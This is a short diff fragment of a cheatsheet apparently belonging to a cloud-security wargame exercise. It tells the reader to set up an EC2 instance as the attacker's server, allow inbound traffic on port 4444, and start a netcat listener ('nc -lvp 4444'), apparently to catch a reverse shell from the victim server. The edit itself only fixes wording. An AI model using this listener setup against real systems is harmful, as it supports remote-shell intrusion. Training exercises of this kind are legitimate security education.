greyhawk16/wargame_test3/cheatsheet.md

 2. Prepare an EC2 instance which will serve as attaccker's server
    - Allow TCP traffic from victim's server coming to port `4444` in Security group
    - open port `4444` using `nc`
-   -  you may use other ports instead of `4444`
+   -  you may use other port instead of `4444`

     ```bash
     nc -lvp 4444